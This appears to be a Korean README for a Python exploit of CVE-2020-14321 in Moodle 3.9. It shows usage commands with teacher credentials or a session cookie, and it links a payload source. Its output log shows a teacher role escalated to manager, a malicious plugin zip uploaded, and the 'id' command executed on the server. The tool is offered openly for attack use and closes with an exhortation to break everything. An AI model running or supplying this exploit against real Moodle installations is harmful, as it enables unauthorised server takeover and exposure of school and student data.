
# Moodle 3.9 인증된 익스플로잇 교사 권한을 관리자 역할로 승격시키고 악성 플러그인 업로드를 통해 원격 코드 실행을 달성하는 Moodle 3.9용 인증된 익스플로잇입니다.
CVE-2020-14321을 악용하는 파이썬 스크립트 - Moodle 3.9
과정 등록 시 교사 역할에서 관리자 역할로의 권한 상승이 허용되어 RCE로 이어질 수 있습니다.
페이로드 출처: https://github.com/HoangKien1020/CVE-2020-14321
유효한 교사 자격 증명이 있는 경우 (실제 환경에서는 충분히 테스트되지 않았습니다. 또는 테스트되었을 수도 있고요, 저도 모릅니다 :P):
❭ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle -u lanz -p 'Lanz123$!'
유효한 교사 쿠키가 있는 경우 (101% 테스트 완료):
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r
...
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r -c id
__ __ __ __ __ __ __ __
/ \ /|_ __ _) / \ _) / \ __ /| |__| _) _) /|
\__ \/ |__ /__ \__/ /__ \__/ | | __) /__ | • by lanz
Moodle 3.9 - Remote Command Execution (Authenticated as teacher)
Course enrolments allowed privilege escalation from teacher role into manager role to RCE
[+] Login on site: MoodleSession:th3f7k1ngggk00ci30ft3ach3r ✓
[+] Updating roles to move on manager accout: ✓
[+] Updating rol manager to enable install plugins: ✓
[+] Uploading malicious .zip file: ✓
[+] Executing id: ✓
uid=80(www) gid=80(www) groups=80(www)
계속해서 모든 것을 부숴뜨려라!!